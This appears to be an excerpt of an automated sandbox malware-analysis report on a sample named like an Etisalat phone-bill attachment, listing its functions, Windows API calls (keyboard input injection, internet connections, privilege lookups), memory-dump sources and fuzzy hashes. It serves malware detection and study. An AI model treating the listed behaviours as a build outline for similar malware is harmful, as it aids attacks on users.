                                      • Opcode Fuzzy Hash: 3b670288df27b654d6e07cf07440b23f0667dd4b5989667be345af4003f02e34
                                      • Instruction Fuzzy Hash: BF41A674740200AFEB10AF24DC86F3A77E9EB04B10F4481A9FA599F3D2DB759D008791
                                      Function 00BD672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BEF910), ref: 00BD67BA
                                      • _strlen.LIBCMT ref: 00BD67EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 17c9f8b741ac2f92567888c4feeed9efeba19c7059e46df228d154bf3672d008
                                      • Instruction ID: 5a4009bc940e5919d6fb9223b53207c1dabd50fbbf8ba5e9ca471c3c7986ce7f
                                      • Opcode Fuzzy Hash: 17c9f8b741ac2f92567888c4feeed9efeba19c7059e46df228d154bf3672d008
                                      • Instruction Fuzzy Hash: 2B417F31A00105ABCB14EBA4DCD5EAEB7E9EF48310F1481E6F91A9B392EB74AD04D750
                                      Function 00BCBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BCBB09
                                      • GetLastError.KERNEL32(?,00000000), ref: 00BCBB2F
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BCBB54
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BCBB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 68e386ed7d7b8ece7e7e6d554181288b5ccf302fd692e22200039bf59cd84aa8
                                      • Instruction ID: 9dc9c6f4d86dfaa51aa97847efe63ab8b6e0d39e0e4043f7fc179821a51bc1e1
                                      • Opcode Fuzzy Hash: 68e386ed7d7b8ece7e7e6d554181288b5ccf302fd692e22200039bf59cd84aa8
                                      • Instruction Fuzzy Hash: A64102396006519FCB10EF15C585E5DBBE5EF89320B0984D8F94A9B3A2CB38FD01CB91
                                      Function 00BE8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BE8B4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 08817475d57d2ab2741874f426a9b83277fdb5701f9be51895584c2eb8221c2f
                                      • Instruction ID: 0e8df519fb082d6fc507b0472a58c12e2cb6c42455ceaf1179bacaab5a309569
                                      • Opcode Fuzzy Hash: 08817475d57d2ab2741874f426a9b83277fdb5701f9be51895584c2eb8221c2f
                                      • Instruction Fuzzy Hash: 1331B4B4600A84BFEF209B3ADC95FA937E5EB05310F244692FA59D72E1CF32E9409751
                                      Function 00BEADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00BEAE1A
                                      • GetWindowRect.USER32(?,?), ref: 00BEAE90
                                      • PtInRect.USER32(?,?,00BEC304), ref: 00BEAEA0
                                      • MessageBeep.USER32(00000000), ref: 00BEAF11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 771a78fa358fe030a42790376970f99235d23a76d18253e077eac226ba599089
                                      • Instruction ID: 6388c7af5a3cfbaa13ae86c847c1ebf85d96936e3e093496492a7e3f936c6203
                                      • Opcode Fuzzy Hash: 771a78fa358fe030a42790376970f99235d23a76d18253e077eac226ba599089
                                      • Instruction Fuzzy Hash: 06417C70600199DFCB21CF6AC884B69BBF9FF48340F2481E9E419DB251D730A902CB92
                                      Function 00BC0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BC1037
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BC1053
                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BC10B9
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BC110B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 81bbf629f011bafa6856cdb3e039ab5c061dba621bc35ff45d781c300fa655dd
                                      • Instruction ID: 4c523352f660a56ac65ab2652ea0b91f6674cbe3007596ca3be93a4ffa0d6d88
                                      • Opcode Fuzzy Hash: 81bbf629f011bafa6856cdb3e039ab5c061dba621bc35ff45d781c300fa655dd
                                      • Instruction Fuzzy Hash: A6312A30A40688AEFB308B6D8C05FF9BBE5EB57310F08469EE580661D2C37449C19751
                                      Function 00BC1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00BC1176
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BC1192
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BC11F1
                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00BC1243
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: c2d56f481a7a9740c8a7e160bffab6e7f57d4c1ee04f7c0b589159fbafed652e
                                      • Instruction ID: bd7414741e32a82d561c22770561771bf16c33f17ac8378f642386d90612111a
                                      • Opcode Fuzzy Hash: c2d56f481a7a9740c8a7e160bffab6e7f57d4c1ee04f7c0b589159fbafed652e
                                      • Instruction Fuzzy Hash: 2F3109309406489AEF349A6D8808FFABBFAEB56310F184B9EE590B61D2C3388D559751
                                      Function 00B96415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B9644B
                                      • __isleadbyte_l.LIBCMT ref: 00B96479
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B964A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B964DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 469cde841d4e2210221906b1de5933258776b87bdcf77590a119071504dca15f
                                      • Instruction ID: caa9cb1a143fc71be1a148b5bdc40a8ab4a0c2b0693b3aad75524687d97b6d19
                                      • Opcode Fuzzy Hash: 469cde841d4e2210221906b1de5933258776b87bdcf77590a119071504dca15f
                                      • Instruction Fuzzy Hash: 5E31AF3160024AAFDF259FB5C885BBA7BE5FF41710F1544B9E8548B3A1EB31D850DB90
                                      Function 00BE5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00BE5189
                                        • Part of subcall function 00BC387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BC3897
                                        • Part of subcall function 00BC387D: GetCurrentThreadId.KERNEL32 ref: 00BC389E
                                        • Part of subcall function 00BC387D: AttachThreadInput.USER32(00000000,?,00BC52A7), ref: 00BC38A5
                                      • GetCaretPos.USER32(?), ref: 00BE519A
                                      • ClientToScreen.USER32(00000000,?), ref: 00BE51D5
                                      • GetForegroundWindow.USER32 ref: 00BE51DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: a5f9dd1dd4d201da519e7c9d40c16bfad1989f162dbfc4d2b133c8f2aaff166f
                                      • Instruction ID: a998ae7a4363f1880190e60cdcfd11effa825e65269c35ebda9003dfac5db6f4
                                      • Opcode Fuzzy Hash: a5f9dd1dd4d201da519e7c9d40c16bfad1989f162dbfc4d2b133c8f2aaff166f
                                      • Instruction Fuzzy Hash: 89311E72900108AFDB10EFA5C885EEFB7FDEF98304F1040AAE415E7241EA759E45CBA1
                                      Function 00BEC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetCursorPos.USER32(?), ref: 00BEC7C2
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B9BBFB,?,?,?,?,?), ref: 00BEC7D7
                                      • GetCursorPos.USER32(?), ref: 00BEC824
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B9BBFB,?,?,?), ref: 00BEC85E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: 5d84b736e80d208b162e9dc2e5159e602c08813cf5e17d8f0d4dd8b38e24b09f
                                      • Instruction ID: 2afbb4aca016f97f1095890df1f981062e30961cafa928b22c2be38f3f86fedd
                                      • Opcode Fuzzy Hash: 5d84b736e80d208b162e9dc2e5159e602c08813cf5e17d8f0d4dd8b38e24b09f
                                      • Instruction Fuzzy Hash: BD313935600098AFDB258F59C898EBE7FFAFB49710F0441A9F9058B2A1C7359D52DBA0
                                      Function 00BB8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BB8669
                                        • Part of subcall function 00BB8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8673
                                        • Part of subcall function 00BB8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8682
                                        • Part of subcall function 00BB8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8689
                                        • Part of subcall function 00BB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB869F
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BB8BEB
                                      • _memcmp.LIBCMT ref: 00BB8C0E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB8C44
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8C4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 287e6b3b114331d6a0232b7d6ccdc6df291491f9f263a4391368f0d0bb266e11
                                      • Instruction ID: 058d09b1651ba6d2907c40a1f56d52b6a07166643465d773e1ee24ac0b9c2911
                                      • Opcode Fuzzy Hash: 287e6b3b114331d6a0232b7d6ccdc6df291491f9f263a4391368f0d0bb266e11
                                      • Instruction Fuzzy Hash: 05217CB1E01209EFDB10DFA4C945BFEBBF8EF44355F144099E554AB241DB71AA06CB60
                                      Function 00B80BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                      • __setmode.LIBCMT ref: 00B80BF2
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      • _fprintf.LIBCMT ref: 00B80C29
                                      • OutputDebugStringW.KERNEL32(?), ref: 00BB6331
                                        • Part of subcall function 00B84CDA: _flsall.LIBCMT ref: 00B84CF3
                                      • __setmode.LIBCMT ref: 00B80C5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      • Opcode ID: a46ce0fa6d762ba7c1d055adfdf755dbd04e5f1e9391266e6e9bb094c71126d4
                                      • Instruction ID: 27701cbf9ebd1ae84cc6d9a0b056ce217ee904344f366ad4962ddabe78b441a0
                                      • Opcode Fuzzy Hash: a46ce0fa6d762ba7c1d055adfdf755dbd04e5f1e9391266e6e9bb094c71126d4
                                      • Instruction Fuzzy Hash: 9A11D2329042096ECB15BBB49C82ABE7BE9DF41320F1401EAF204571A2DF755D56C7A5
                                      Function 00BD1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BD1A97
                                        • Part of subcall function 00BD1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BD1B40
                                        • Part of subcall function 00BD1B21: InternetCloseHandle.WININET(00000000), ref: 00BD1BDD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: c20c90f7b44a56341666505b9a7d0926ac22d5f1f991def1754c65147cfdf842
                                      • Instruction ID: b5b15ed8176104eb97c689a8617d99c8b96f357ffcfa2720f781487a98185a7c
                                      • Opcode Fuzzy Hash: c20c90f7b44a56341666505b9a7d0926ac22d5f1f991def1754c65147cfdf842
                                      • Instruction Fuzzy Hash: 0B21BE31200A41BFDB129F648C40FBAF7EDFB94700F10446BFA1196650FB7198119BA0
                                      Function 00BBE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BBF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BBE1C4,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?), ref: 00BBF5BC
                                        • Part of subcall function 00BBF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00BBF5E2
                                        • Part of subcall function 00BBF5AD: lstrcmpiW.KERNEL32(00000000,?,00BBE1C4,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?), ref: 00BBF613
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00BBE1DD
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00BBE203
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BBEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00BBE237
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 346ebfa88fd885f7d996b6d5bc957df8c5bc96293c842cad11a8cdf4763c5d0d
                                      • Instruction ID: 11c67cc7c61f03018ae396ec0f58c1d02c2a56bb3ab1e69b86badc7a06eac997
                                      • Opcode Fuzzy Hash: 346ebfa88fd885f7d996b6d5bc957df8c5bc96293c842cad11a8cdf4763c5d0d
                                      • Instruction Fuzzy Hash: F711BE3A200345EFCB25AF64DC459BA77E8FF85350B40806AF816CB260EBB1D851D7A1
                                      Function 00B95332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00B95351
                                        • Part of subcall function 00B8594C: __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8594C: __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8594C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 5a6aa42e4a65428baa4a4fd4948c15713cbf74f7a21b4af5bd556557f4ee29cf
                                      • Instruction ID: f20ace0bcac18254edd2a9bb9d66e46fc19cfb750ad1a691f7f2ce374a2e779d
                                      • Opcode Fuzzy Hash: 5a6aa42e4a65428baa4a4fd4948c15713cbf74f7a21b4af5bd556557f4ee29cf
                                      • Instruction Fuzzy Hash: E511A332548A15AFCF323F70EC8566D37D8AF107A0B1045BAF9469A1A1DE718D41D798
                                      Function 00B64531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00B64560
                                        • Part of subcall function 00B6410D: _memset.LIBCMT ref: 00B6418D
                                        • Part of subcall function 00B6410D: _wcscpy.LIBCMT ref: 00B641E1
                                        • Part of subcall function 00B6410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B641F1
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00B645B5
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B645C4
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B9D6CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
